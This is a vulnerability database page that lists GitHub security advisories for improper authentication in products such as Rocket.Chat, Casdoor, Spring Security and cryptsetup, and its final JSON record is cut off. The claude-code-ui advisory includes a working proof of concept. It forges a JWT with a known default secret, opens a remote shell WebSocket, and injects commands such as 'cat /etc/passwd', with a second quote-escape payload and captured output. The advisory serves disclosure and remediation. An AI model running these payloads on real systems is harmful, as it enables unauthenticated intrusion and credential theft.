Common Weakness Enumeration

CWE-287

Discouraged

Improper Authentication

Abstraction: Class · Status: Draft

When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

5968 vulnerabilities reference this CWE, most recent first.

GHSA-GV26-X27M-RFG3

Vulnerability from github – Published: 2022-09-25 00:00 – Updated: 2022-09-27 00:00
VLAI
Details

A improper authentication vulnerability exists in Rocket.Chat <v5, <v4.8.2 and <v4.7.5 that allowed two factor authentication can be bypassed when telling the server to use CAS during login.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-35248"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-09-23T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "A improper authentication vulnerability exists in Rocket.Chat \u003cv5, \u003cv4.8.2 and \u003cv4.7.5 that allowed two factor authentication can be bypassed when telling the server to use CAS during login.",
  "id": "GHSA-gv26-x27m-rfg3",
  "modified": "2022-09-27T00:00:17Z",
  "published": "2022-09-25T00:00:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35248"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1448268"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GV3C-8HG4-9HXX

Vulnerability from github – Published: 2022-05-21 00:01 – Updated: 2022-06-02 00:00
VLAI
Details

Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-28993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-20T13:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.",
  "id": "GHSA-gv3c-8hg4-9hxx",
  "modified": "2022-06-02T00:00:21Z",
  "published": "2022-05-21T00:01:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28993"
    },
    {
      "type": "WEB",
      "url": "https://packetstormsecurity.com/files/166591/Multi-Store-Inventory-Management-System-1.0-Account-Takeover.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GV4M-V8C8-HR3G

Vulnerability from github – Published: 2026-05-28 18:30 – Updated: 2026-07-02 18:36
VLAI
Summary
Casdoor allows users to bypass configured MFA requirements
Details

Casdoor versions 2.362.0 and earlier contain a logic flaw in the social‑login binding flow that allows users to bypass configured MFA requirements. The binding‑rule code path in controllers/auth.go calls HandleLoggedIn directly without invoking checkMfaEnable. Any user authenticating via this path is logged in without MFA enforcement.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/casdoor/casdoor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.1000.1-0.20260321120606-239e8bd69487"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-9091"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T18:36:38Z",
    "nvd_published_at": "2026-05-28T17:16:33Z",
    "severity": "MODERATE"
  },
  "details": "Casdoor versions 2.362.0 and earlier contain a logic flaw in the social\u2011login binding flow that allows users to bypass configured MFA requirements. The binding\u2011rule code path in controllers/auth.go calls HandleLoggedIn directly without invoking checkMfaEnable. Any user authenticating via this path is logged in without MFA enforcement.",
  "id": "GHSA-gv4m-v8c8-hr3g",
  "modified": "2026-07-02T18:36:38Z",
  "published": "2026-05-28T18:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9091"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/casdoor/casdoor"
    },
    {
      "type": "WEB",
      "url": "https://kb.cert.org/vuls/id/780781"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Casdoor allows users to bypass configured MFA requirements"
}

GHSA-GV5C-CRRP-M3Q4

Vulnerability from github – Published: 2022-05-24 16:49 – Updated: 2024-04-04 01:12
VLAI
Details

iDoors Reader 2.10.17 and earlier allows an attacker on the same network segment to bypass authentication to access the management console and operate the product via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-5964"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-07-05T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "iDoors Reader 2.10.17 and earlier allows an attacker on the same network segment to bypass authentication to access the management console and operate the product via unspecified vectors.",
  "id": "GHSA-gv5c-crrp-m3q4",
  "modified": "2024-04-04T01:12:05Z",
  "published": "2022-05-24T16:49:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5964"
    },
    {
      "type": "WEB",
      "url": "https://idoors.jp/info/20190701"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN28218613/index.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GV5V-VGX2-HGVR

Vulnerability from github – Published: 2022-05-17 03:02 – Updated: 2022-05-17 03:02
VLAI
Details

The Debian initrd script for the cryptsetup package 2:1.7.3-2 and earlier allows physically proximate attackers to gain shell access via many log in attempts with an invalid password.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-4484"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-01-23T21:59:00Z",
    "severity": "HIGH"
  },
  "details": "The Debian initrd script for the cryptsetup package 2:1.7.3-2 and earlier allows physically proximate attackers to gain shell access via many log in attempts with an invalid password.",
  "id": "GHSA-gv5v-vgx2-hgvr",
  "modified": "2022-05-17T03:02:45Z",
  "published": "2022-05-17T03:02:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4484"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/cryptsetup/cryptsetup/commit/ef8a7d82d8d3716ae9b58179590f7908981fa0cb"
    },
    {
      "type": "WEB",
      "url": "http://hmarco.org/bugs/CVE-2016-4484/CVE-2016-4484_cryptsetup_initrd_shell.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/11/14/13"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/11/15/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/11/15/4"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2016/11/16/6"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/94315"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-GV6G-6Q5C-XWRM

Vulnerability from github – Published: 2022-05-17 02:17 – Updated: 2022-05-17 02:17
VLAI
Details

Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-5407"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-12-10T06:44:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple unspecified vulnerabilities in the Backup Exec remote-agent logon process in Symantec Backup Exec for Windows Servers 11.0 (aka 11d) builds 6235 and 7170, 12.0 build 1364, and 12.5 build 2213 allow remote attackers to bypass authentication, and read or delete files, via unknown vectors.",
  "id": "GHSA-gv6g-6q5c-xwrm",
  "modified": "2022-05-17T02:17:39Z",
  "published": "2022-05-17T02:17:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5407"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/46730"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/32810"
    },
    {
      "type": "WEB",
      "url": "http://securityresponse.symantec.com/avcenter/security/Content/2008.11.19.html"
    },
    {
      "type": "WEB",
      "url": "http://seer.entsupport.symantec.com/docs/314528.htm"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/32347"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1021246"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2008/3209"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-GV8F-WPM2-M5WR

Vulnerability from github – Published: 2026-03-11 00:37 – Updated: 2026-03-11 20:58
VLAI
Summary
@siteboon/claude-code-ui Vulnerable to Unauthenticated RCE via WebSocket Shell Injection
Details

Security Advisory: Insecure Default JWT Secret + WebSocket Auth Bypass Enables Unauthenticated RCE via Shell Injection

Download: cve_claudecodeui_submission_v2.zip

 Submission Info

Field Value
Package @siteboon/claude-code-ui
Ecosystem npm
Affected versions <= 1.24.0 (latest)
Severity Critical
CVSS Score 9.8
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE CWE-1188, CWE-287, CWE-78
Reported 2026-03-02
Researcher Ethan-Yang (OPCIA)

Summary

Three chained vulnerabilities allow unauthenticated remote code execution on any claudecodeui instance running with default configuration. No account, credentials, or prior access is required.

The root cause of RCE is OS command injection (CWE-78) in the WebSocket shell handler. Authentication is bypassed by combining an insecure default JWT secret (CWE-1188) with a WebSocket authentication function that skips database user validation (CWE-287).


Vulnerability Details

1. Insecure Default JWT Secret — CWE-1188

File: server/middleware/auth.js, line 6

const JWT_SECRET = process.env.JWT_SECRET || 'claude-ui-dev-secret-change-in-production';

The server uses an environment variable for JWT_SECRET, but falls back to a well-known default value when the variable is not set. Critically, JWT_SECRET is not included in .env.example, so the majority of users deploy without setting it, leaving the fallback value in effect.

Since this default string is published verbatim in the public source code, any attacker can use it to sign arbitrary JWT tokens.


2. WebSocket Authentication Skips Database Validation — CWE-287

File: server/middleware/auth.js, lines 82–108

authenticateWebSocket() only verifies the JWT signature. It does not check whether the userId in the payload actually exists in the database — unlike authenticateToken() which is used for REST endpoints and does perform this check:

// authenticateWebSocket() — VULNERABLE
const decoded = jwt.verify(token, JWT_SECRET);
return decoded;  // ← userId never verified against DB

// authenticateToken() — CORRECT (REST endpoints)
const decoded = jwt.verify(token, JWT_SECRET);
const user = userDb.getUserById(decoded.userId);  // ← DB check present
if (!user) return res.status(401)...

A forged token with a non-existent userId passes WebSocket authentication, bypassing access control entirely.


3. OS Command Injection via WebSocket Shell — CWE-78

File: server/index.js, line 1179


shellCommand = `cd "${projectPath}" && ${initialCommand}`;

Both projectPath and initialCommand are taken directly from the WebSocket message payload and interpolated into a bash command string without any sanitization, enabling arbitrary OS command execution.

A secondary injection vector exists at line 1257 via unsanitized sessionId:

shellCommand = `cd "${projectPath}" && claude --resume ${sessionId} || claude`;

Proof of Concept

Requirements: Node.js, jsonwebtoken, ws

import jwt from 'jsonwebtoken';
import WebSocket from 'ws';

// Step 1: Sign a token with the publicly known default secret
const token = jwt.sign(
  { userId: 1337, username: 'attacker' },
  'claude-ui-dev-secret-change-in-production'
);

// Step 2: Connect to /shell WebSocket — auth passes because
//         authenticateWebSocket() does not verify userId in DB
const ws = new WebSocket(`ws://TARGET_HOST:3001/shell?token=${token}`);

ws.on('open', () => {
  // Step 3: initialCommand is injected directly into bash
  ws.send(JSON.stringify({
    type: 'init',
    projectPath: '/tmp',
    initialCommand: 'id && cat /etc/passwd',
    isPlainShell: true,
    hasSession: false
  }));
});

ws.on('message', (data) => {
  const msg = JSON.parse(data);
  if (msg.type === 'output') process.stdout.write(msg.data);
});

Actual output observed during testing:

uid=1001(user) gid=1001(user) groups=1001(user),27(sudo)
ubuntu
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Secondary vector — projectPath double-quote escape injection

ws.send(JSON.stringify({
  type: 'init',
  projectPath: '" && id && echo "pwned" # ',
  provider: 'claude',
  hasSession: false
}));
// Server executes: cd "" && id && echo "pwned" # " && claude
// Output: uid=1001... / pwned

Additional Findings

CWE Location Description
CWE-306 server/routes/auth.js:22 /api/auth/register requires no authentication — first caller becomes admin
CWE-942 server/index.js:325 cors() with no options sets Access-Control-Allow-Origin: *
CWE-613 server/middleware/auth.js:70 generateToken() sets no expiresIn — tokens never expire

Impact

Any claudecodeui instance accessible over the network where JWT_SECRET is not explicitly configured (the default case, as it is absent from .env.example) is vulnerable to:

  • Full OS command execution as the server process user
  • File system read/write access
  • Credential theft (SSH keys, .env files, API keys stored on the host)
  • Lateral movement within the host network

The attack requires zero authentication and succeeds immediately after default installation.


Remediation

Fix 1 — Enforce explicit JWT_SECRET; remove insecure default

// server/middleware/auth.js
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) {
  console.error('[FATAL] JWT_SECRET environment variable must be set');
  process.exit(1);
}

Also add JWT_SECRET= to .env.example with a clear instruction to set a strong random value.

Fix 2 — Add DB user existence check in WebSocket authentication

const authenticateWebSocket = (token) => {
  if (!token) return null;
  try {
    const decoded = jwt.verify(token, JWT_SECRET);
    const user = userDb.getUserById(decoded.userId); // ← add
    if (!user) return null;                          // ← add
    return user;
  } catch (error) {
    return null;
  }
};

Fix 3 — Replace shell string interpolation with spawn argument array

// Instead of:
const shellProcess = pty.spawn('bash', ['-c', `cd "${projectPath}" && ${initialCommand}`], ...);

// Use:
const shellProcess = pty.spawn(initialCommand.split(' ')[0], initialCommand.split(' ').slice(1), {
  cwd: projectPath  // pass path as cwd, not shell string
});

Fix 4 — Additional hardening

  • Add expiresIn: '24h' to generateToken()
  • Restrict CORS to specific trusted origins
  • Rate-limit and restrict /api/auth/register to localhost on initial setup

Timeline

Date Event
2026-03-02 Vulnerabilities discovered and verified via PoC
2026-03-02 Private advisory submitted to maintainer
2026-06-01 Public disclosure (90-day deadline)

Researcher

Ethan-Yang — OPCIA

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.24.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@siteboon/claude-code-ui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31975"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-287",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-11T00:37:25Z",
    "nvd_published_at": "2026-03-11T18:16:27Z",
    "severity": "HIGH"
  },
  "details": "# Security Advisory: Insecure Default JWT Secret + WebSocket Auth Bypass Enables Unauthenticated RCE via Shell Injection\nDownload: [cve_claudecodeui_submission_v2.zip](https://github.com/user-attachments/files/25686652/cve_claudecodeui_submission_v2.zip)\n\n## \uf4cb Submission Info\n\n| Field | Value |\n|-------|-------|\n| **Package** | `@siteboon/claude-code-ui` |\n| **Ecosystem** | npm |\n| **Affected versions** | `\u003c= 1.24.0` (latest) |\n| **Severity** | Critical |\n| **CVSS Score** | 9.8 |\n| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |\n| **CWE** | CWE-1188, CWE-287, CWE-78 |\n| **Reported** | 2026-03-02 |\n| **Researcher** | Ethan-Yang (OPCIA) |\n\n---\n\n## Summary\n\nThree chained vulnerabilities allow **unauthenticated remote code execution** on any\nclaudecodeui instance running with default configuration. No account, credentials, or\nprior access is required.\n\nThe root cause of RCE is **OS command injection (CWE-78)** in the WebSocket shell\nhandler. Authentication is bypassed by combining an insecure default JWT secret\n**(CWE-1188)** with a WebSocket authentication function that skips database user\nvalidation **(CWE-287)**.\n\n---\n\n## Vulnerability Details\n\n### 1. Insecure Default JWT Secret \u2014 `CWE-1188`\n\n**File**: `server/middleware/auth.js`, line 6\n\n```javascript\nconst JWT_SECRET = process.env.JWT_SECRET || \u0027claude-ui-dev-secret-change-in-production\u0027;\n```\n\nThe server uses an environment variable for `JWT_SECRET`, but falls back to a\nwell-known default value when the variable is not set. Critically, `JWT_SECRET` is\n**not included in `.env.example`**, so the majority of users deploy without setting it,\nleaving the fallback value in effect.\n\nSince this default string is published verbatim in the public source code, any attacker\ncan use it to sign arbitrary JWT tokens.\n\n---\n\n### 2. WebSocket Authentication Skips Database Validation \u2014 `CWE-287`\n\n**File**: `server/middleware/auth.js`, lines 82\u2013108\n\n`authenticateWebSocket()` only verifies the JWT **signature**. It does **not** check\nwhether the `userId` in the payload actually exists in the database \u2014 unlike\n`authenticateToken()` which is used for REST endpoints and does perform this check:\n\n```javascript\n// authenticateWebSocket() \u2014 VULNERABLE\nconst decoded = jwt.verify(token, JWT_SECRET);\nreturn decoded;  // \u2190 userId never verified against DB\n\n// authenticateToken() \u2014 CORRECT (REST endpoints)\nconst decoded = jwt.verify(token, JWT_SECRET);\nconst user = userDb.getUserById(decoded.userId);  // \u2190 DB check present\nif (!user) return res.status(401)...\n```\n\nA forged token with a non-existent `userId` passes WebSocket authentication,\nbypassing access control entirely.\n\n---\n\n### 3. OS Command Injection via WebSocket Shell \u2014 `CWE-78`\n\n**File**: `server/index.js`, line 1179\n\n```javascript\n\nshellCommand = `cd \"${projectPath}\" \u0026\u0026 ${initialCommand}`;\n```\n\nBoth `projectPath` and `initialCommand` are taken directly from the WebSocket message\npayload and interpolated into a bash command string without any sanitization,\nenabling arbitrary OS command execution.\n\nA secondary injection vector exists at line 1257 via unsanitized `sessionId`:\n\n```javascript\nshellCommand = `cd \"${projectPath}\" \u0026\u0026 claude --resume ${sessionId} || claude`;\n```\n\n---\n\n## Proof of Concept\n\n**Requirements**: Node.js, `jsonwebtoken`, `ws`\n\n```javascript\nimport jwt from \u0027jsonwebtoken\u0027;\nimport WebSocket from \u0027ws\u0027;\n\n// Step 1: Sign a token with the publicly known default secret\nconst token = jwt.sign(\n  { userId: 1337, username: \u0027attacker\u0027 },\n  \u0027claude-ui-dev-secret-change-in-production\u0027\n);\n\n// Step 2: Connect to /shell WebSocket \u2014 auth passes because\n//         authenticateWebSocket() does not verify userId in DB\nconst ws = new WebSocket(`ws://TARGET_HOST:3001/shell?token=${token}`);\n\nws.on(\u0027open\u0027, () =\u003e {\n  // Step 3: initialCommand is injected directly into bash\n  ws.send(JSON.stringify({\n    type: \u0027init\u0027,\n    projectPath: \u0027/tmp\u0027,\n    initialCommand: \u0027id \u0026\u0026 cat /etc/passwd\u0027,\n    isPlainShell: true,\n    hasSession: false\n  }));\n});\n\nws.on(\u0027message\u0027, (data) =\u003e {\n  const msg = JSON.parse(data);\n  if (msg.type === \u0027output\u0027) process.stdout.write(msg.data);\n});\n```\n\n**Actual output observed during testing:**\n```\nuid=1001(user) gid=1001(user) groups=1001(user),27(sudo)\nubuntu\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...\n```\n\n### Secondary vector \u2014 `projectPath` double-quote escape injection\n\n```javascript\nws.send(JSON.stringify({\n  type: \u0027init\u0027,\n  projectPath: \u0027\" \u0026\u0026 id \u0026\u0026 echo \"pwned\" # \u0027,\n  provider: \u0027claude\u0027,\n  hasSession: false\n}));\n// Server executes: cd \"\" \u0026\u0026 id \u0026\u0026 echo \"pwned\" # \" \u0026\u0026 claude\n// Output: uid=1001... / pwned\n```\n\n---\n\n## Additional Findings\n\n| CWE | Location | Description |\n|-----|----------|-------------|\n| CWE-306 | `server/routes/auth.js:22` | `/api/auth/register` requires no authentication \u2014 first caller becomes admin |\n| CWE-942 | `server/index.js:325` | `cors()` with no options sets `Access-Control-Allow-Origin: *` |\n| CWE-613 | `server/middleware/auth.js:70` | `generateToken()` sets no `expiresIn` \u2014 tokens never expire |\n\n---\n\n## Impact\n\nAny claudecodeui instance accessible over the network where `JWT_SECRET` is not\nexplicitly configured (the default case, as it is absent from `.env.example`) is\nvulnerable to:\n\n- **Full OS command execution** as the server process user\n- **File system read/write** access\n- **Credential theft** (SSH keys, `.env` files, API keys stored on the host)\n- **Lateral movement** within the host network\n\nThe attack requires **zero authentication** and succeeds immediately after\ndefault installation.\n\n---\n\n## Remediation\n\n### Fix 1 \u2014 Enforce explicit JWT_SECRET; remove insecure default\n```javascript\n// server/middleware/auth.js\nconst JWT_SECRET = process.env.JWT_SECRET;\nif (!JWT_SECRET) {\n  console.error(\u0027[FATAL] JWT_SECRET environment variable must be set\u0027);\n  process.exit(1);\n}\n```\nAlso add `JWT_SECRET=` to `.env.example` with a clear instruction to set a strong random value.\n\n### Fix 2 \u2014 Add DB user existence check in WebSocket authentication\n```javascript\nconst authenticateWebSocket = (token) =\u003e {\n  if (!token) return null;\n  try {\n    const decoded = jwt.verify(token, JWT_SECRET);\n    const user = userDb.getUserById(decoded.userId); // \u2190 add\n    if (!user) return null;                          // \u2190 add\n    return user;\n  } catch (error) {\n    return null;\n  }\n};\n```\n\n### Fix 3 \u2014 Replace shell string interpolation with spawn argument array\n```javascript\n// Instead of:\nconst shellProcess = pty.spawn(\u0027bash\u0027, [\u0027-c\u0027, `cd \"${projectPath}\" \u0026\u0026 ${initialCommand}`], ...);\n\n// Use:\nconst shellProcess = pty.spawn(initialCommand.split(\u0027 \u0027)[0], initialCommand.split(\u0027 \u0027).slice(1), {\n  cwd: projectPath  // pass path as cwd, not shell string\n});\n```\n\n### Fix 4 \u2014 Additional hardening\n- Add `expiresIn: \u002724h\u0027` to `generateToken()`\n- Restrict CORS to specific trusted origins\n- Rate-limit and restrict `/api/auth/register` to localhost on initial setup\n\n---\n\n## Timeline\n\n| Date | Event |\n|------|-------|\n| 2026-03-02 | Vulnerabilities discovered and verified via PoC |\n| 2026-03-02 | Private advisory submitted to maintainer |\n| 2026-06-01 | Public disclosure (90-day deadline) |\n\n---\n\n## Researcher\n\n**Ethan-Yang** \u2014 OPCIA",
  "id": "GHSA-gv8f-wpm2-m5wr",
  "modified": "2026-03-11T20:58:52Z",
  "published": "2026-03-11T00:37:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siteboon/claudecodeui/security/advisories/GHSA-gv8f-wpm2-m5wr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31975"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siteboon/claudecodeui/commit/12e7f074d9563b3264caf9cec6e1b701c301af26"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siteboon/claudecodeui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siteboon/claudecodeui/releases/tag/v1.25.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@siteboon/claude-code-ui Vulnerable to Unauthenticated RCE via WebSocket Shell Injection"
}

GHSA-GV97-CHP3-8XHH

Vulnerability from github – Published: 2022-05-24 17:36 – Updated: 2022-05-24 17:36
VLAI
Details

The REST API component of TIBCO Software Inc.'s TIBCO PartnerExpress contains a vulnerability that theoretically allows an unauthenticated attacker with network access to obtain an authenticated login URL for the affected system via a REST API. Affected releases are TIBCO Software Inc.'s TIBCO PartnerExpress: version 6.2.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-27147"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-15T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The REST API component of TIBCO Software Inc.\u0027s TIBCO PartnerExpress contains a vulnerability that theoretically allows an unauthenticated attacker with network access to obtain an authenticated login URL for the affected system via a REST API. Affected releases are TIBCO Software Inc.\u0027s TIBCO PartnerExpress: version 6.2.0.",
  "id": "GHSA-gv97-chp3-8xhh",
  "modified": "2022-05-24T17:36:32Z",
  "published": "2022-05-24T17:36:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27147"
    },
    {
      "type": "WEB",
      "url": "https://www.tibco.com/support/advisories/2020/12/tibco-security-advisory-december-15-2020-tibco-partnerexpress"
    },
    {
      "type": "WEB",
      "url": "http://www.tibco.com/services/support/advisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-GV9V-C375-HVMG

Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2022-07-07 23:04
VLAI
Summary
Improper Authentication in Spring Security
Details

The ActiveDirectoryLdapAuthenticator in Spring Security 3.2.0 to 3.2.1 and 3.1.0 to 3.1.5 does not check the password length. If the directory allows anonymous binds then it may incorrectly authenticate a user who supplies an empty password.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.2.1.RELEASE"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.springframework.security:spring-security-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.0"
            },
            {
              "fixed": "3.2.2.RELEASE"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.4.RELEASE"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.springframework.security:spring-security-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1.0"
            },
            {
              "fixed": "3.1.5.RELEASE"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2014-0097"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-07-07T23:04:22Z",
    "nvd_published_at": "2017-05-25T17:29:00Z",
    "severity": "HIGH"
  },
  "details": "The ActiveDirectoryLdapAuthenticator in Spring Security 3.2.0 to 3.2.1 and 3.1.0 to 3.1.5 does not check the password length. If the directory allows anonymous binds then it may incorrectly authenticate a user who supplies an empty password.",
  "id": "GHSA-gv9v-c375-hvmg",
  "modified": "2022-07-07T23:04:22Z",
  "published": "2022-05-13T01:01:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0097"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spring-projects/spring-security/commit/7dbb8e777ece8675f3333a1ef1cb4d6b9be80395"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spring-projects/spring-security/commit/88559882e967085c47a7e1dcbc4dc32c2c796868"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spring-projects/spring-security/commit/a7005bd74241ac8e2e7b38ae31bc4b0f641ef973"
    },
    {
      "type": "WEB",
      "url": "https://jira.springsource.org/browse/SEC-2500"
    },
    {
      "type": "WEB",
      "url": "https://pivotal.io/security/cve-2014-0097"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Authentication in Spring Security"
}

GHSA-GVFJ-FXX3-J323

Vulnerability from github – Published: 2022-12-31 03:30 – Updated: 2024-05-20 21:43
VLAI
Summary
mellium.im/sasl authentication failure due to insufficient nonce randomness
Details

An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "mellium.im/sasl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-48195"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-04T13:56:47Z",
    "nvd_published_at": "2022-12-31T01:15:00Z",
    "severity": "CRITICAL"
  },
